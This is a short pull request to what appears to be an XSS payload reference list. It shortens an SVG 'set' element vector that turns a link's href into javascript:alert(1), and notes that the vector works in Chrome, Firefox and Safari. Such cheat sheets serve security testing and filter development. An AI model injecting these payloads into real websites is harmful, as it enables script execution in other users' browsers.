### PR TITLE
Edit svg set payload

### DIFF
--- a/json/protocols.json
+++ b/json/protocols.json
@@ -46,7 +46,7 @@
   },
   {
     "description": "SVG set tag",
-    "code": "<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>",
+    "code": "<svg><set xlink:href=#x attributeName=href to=javascript:alert(1) /><a id=x><text x=20 y=20>XSS</text></a>",
     "browsers": ["chrome", "firefox", "safari"]
   },
   {


### PR DESCRIPTION
- from attribute is not required in svg set element (see https://developer.mozilla.org/en-US/docs/Web/SVG/Reference/Element/set)
- shortened payload a bit